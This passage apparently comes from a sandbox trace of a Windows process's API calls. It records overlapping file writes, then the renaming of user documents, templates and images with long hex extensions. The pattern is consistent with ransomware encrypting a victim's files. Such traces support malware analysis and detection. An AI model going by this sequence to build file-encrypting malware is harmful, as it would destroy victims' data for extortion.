hFile=0x5e4, lpBuffer=0x77c9050*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77a8f18 | out: lpBuffer=0x77c9050*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77a8f18) returned 1 [0164.722] RtlInterlockedCompareExchange64 () returned 0x0 [0164.722] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.852] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.856] RtlInterlockedCompareExchange64 () returned 0x0 [0164.856] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.871] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.873] RtlInterlockedCompareExchange64 () returned 0x0 [0164.873] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.885] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.886] RtlInterlockedCompareExchange64 () returned 0x0 [0164.886] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.902] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.906] RtlInterlockedCompareExchange64 () returned 0x0 [0164.906] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.923] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.924] RtlInterlockedCompareExchange64 () returned 0x0 [0164.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.948] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.949] RtlInterlockedCompareExchange64 () returned 0x0 [0164.949] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.964] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x5200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.965] RtlInterlockedCompareExchange64 () returned 0x0 [0164.965] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.984] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.985] RtlInterlockedCompareExchange64 () returned 0x0 [0164.985] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.999] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x4800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.000] RtlInterlockedCompareExchange64 () returned 0x0 [0165.000] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.014] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.015] RtlInterlockedCompareExchange64 () returned 0x0 [0165.015] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.042] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.045] RtlInterlockedCompareExchange64 () returned 0x0 [0165.045] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.414] WriteFile (in: hFile=0x304, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.417] RtlInterlockedCompareExchange64 () returned 0x0 [0165.417] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.418] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0165.427] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml", lpString2=".233CF717EF7A8201B3E0F4AE20CA39E9107901B2455D31CCCF92BA4632833D16" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.233CF717EF7A8201B3E0F4AE20CA39E9107901B2455D31CCCF92BA4632833D16") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.233CF717EF7A8201B3E0F4AE20CA39E9107901B2455D31CCCF92BA4632833D16" [0165.427] GetProcessHeap () returned 0x270000 [0165.427] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x2ce8f0 [0165.428] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x723f8dc, FileInformation=0x2ce8f0, Length=0x140, FileInformationClass=0xa) returned 0x0 [0165.432] CloseHandle (hObject=0x304) returned 1 [0165.435] GetProcessHeap () returned 0x270000 [0165.436] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.436] RtlInterlockedCompareExchange64 () returned 0x1 [0165.436] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.590] ReadFile (in: hFile=0x5b8, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x4600, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.590] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.603] WriteFile (in: hFile=0x5b8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.614] RtlInterlockedCompareExchange64 () returned 0x0 [0165.614] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.617] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0165.618] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm", lpString2=".EAE8BA176D0845E2166C705567DE66951C45C72AD6291547E8FED818AE92D662" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.EAE8BA176D0845E2166C705567DE66951C45C72AD6291547E8FED818AE92D662") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.EAE8BA176D0845E2166C705567DE66951C45C72AD6291547E8FED818AE92D662" [0165.618] GetProcessHeap () returned 0x270000 [0165.618] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x144) returned 0x42576a8 [0165.618] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x723f8dc, FileInformation=0x42576a8, Length=0x144, FileInformationClass=0xa) returned 0x0 [0165.627] CloseHandle (hObject=0x5b8) returned 1 [0165.631] GetProcessHeap () returned 0x270000 [0165.633] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.633] RtlInterlockedCompareExchange64 () returned 0x1 [0165.633] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.719] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x6000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.719] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.721] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0165.722] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg", lpString2=".646A9309FC98045B8CA121A938272DC8B0BE05FC88115315E4979063710D3063" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg.646A9309FC98045B8CA121A938272DC8B0BE05FC88115315E4979063710D3063") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg.646A9309FC98045B8CA121A938272DC8B0BE05FC88115315E4979063710D3063" [0165.722] GetProcessHeap () returned 0x270000 [0165.722] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 0x42769c8 [0165.722] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42769c8, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0165.723] CloseHandle (hObject=0x598) returned 1 [0165.725] GetProcessHeap () returned 0x270000 [0165.727] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.731] RtlInterlockedCompareExchange64 () returned 0x1 [0165.732] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.732] WriteFile (in: hFile=0x5b8, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0165.733] RtlInterlockedCompareExchange64 () returned 0x0 [0165.733] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.754] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0165.756] RtlInterlockedCompareExchange64 () returned 0x0 [0165.756] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.768] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0165.770] RtlInterlockedCompareExchange64 () returned 0x0 [0165.770] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.781] ReadFile (in: hFile=0x5e4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.781] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.792] ReadFile (in: hFile=0x304, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0165.793] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.974] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0165.975] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx", lpString2=".04928C5ACBA00CC2ADC61DC76FE3A47BE5E84DCEC0BF1775937211F8D0B6B30C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx.04928C5ACBA00CC2ADC61DC76FE3A47BE5E84DCEC0BF1775937211F8D0B6B30C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx.04928C5ACBA00CC2ADC61DC76FE3A47BE5E84DCEC0BF1775937211F8D0B6B30C" [0165.975] GetProcessHeap () returned 0x270000 [0165.975] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x741c578 [0165.975] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x723f8dc, FileInformation=0x741c578, Length=0x122, FileInformationClass=0xa) returned 0x0 [0165.992] CloseHandle (hObject=0x5b8) returned 1 [0165.994] GetProcessHeap () returned 0x270000 [0165.996] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.996] RtlInterlockedCompareExchange64 () returned 0x3 [0165.996] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.406] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0166.407] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg", lpString2=".A2838672BA355DDDECC6CD31D47EC10BB3774435A8BE29DCA39A85FFBFCB9E5A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg.A2838672BA355DDDECC6CD31D47EC10BB3774435A8BE29DCA39A85FFBFCB9E5A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg.A2838672BA355DDDECC6CD31D47EC10BB3774435A8BE29DCA39A85FFBFCB9E5A" [0166.407] GetProcessHeap () returned 0x270000 [0166.407] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x110) returned 0x42675f8 [0166.408] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x42675f8, Length=0x110, FileInformationClass=0xa) returned 0x0 [0166.409] CloseHandle (hObject=0x5ac) returned 1 [0166.410] GetProcessHeap () returned 0x270000 [0166.411] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.411] RtlInterlockedCompareExchange64 () returned 0x1 [0166.411] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.416] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.417] RtlInterlockedCompareExchange64 () returned 0x0 [0166.417] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.848] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.849] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods", lpString2=".FFD39BD055F9221009AED28AB5373C5CF629ADF0063BE2ED83CDBF4EEBA50361" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods.FFD39BD055F9221009AED28AB5373C5CF629ADF0063BE2ED83CDBF4EEBA50361") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods.FFD39BD055F9221009AED28AB5373C5CF629ADF0063BE2ED83CDBF4EEBA50361" [0166.849] GetProcessHeap () returned 0x270000 [0166.849] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb608 [0166.849] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42fb608, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0166.852] CloseHandle (hObject=0x598) returned 1 [0166.853] GetProcessHeap () returned 0x270000 [0166.855] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.855] RtlInterlockedCompareExchange64 () returned 0x1 [0166.855] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.859] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.862] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.864] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.865] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt", lpString2=".CAB457B9228624208E8BCE4F249321F53A30AB9F81B494407F36A053E385E675" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt.CAB457B9228624208E8BCE4F249321F53A30AB9F81B494407F36A053E385E675") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt.CAB457B9228624208E8BCE4F249321F53A30AB9F81B494407F36A053E385E675" [0166.865] GetProcessHeap () returned 0x270000 [0166.865] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x741d550 [0166.865] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x741d550, Length=0x126, FileInformationClass=0xa) returned 0x0 [0166.867] CloseHandle (hObject=0x598) returned 1 [0166.868] GetProcessHeap () returned 0x270000 [0166.870] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.870] RtlInterlockedCompareExchange64 () returned 0x1 [0166.870] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.880] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.880] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.883] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0166.884] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx", lpString2=".B0986AC744A548A5E983291801FE83A46476ED8B6A52D9F1388CAAE1FFCBE642" | out: 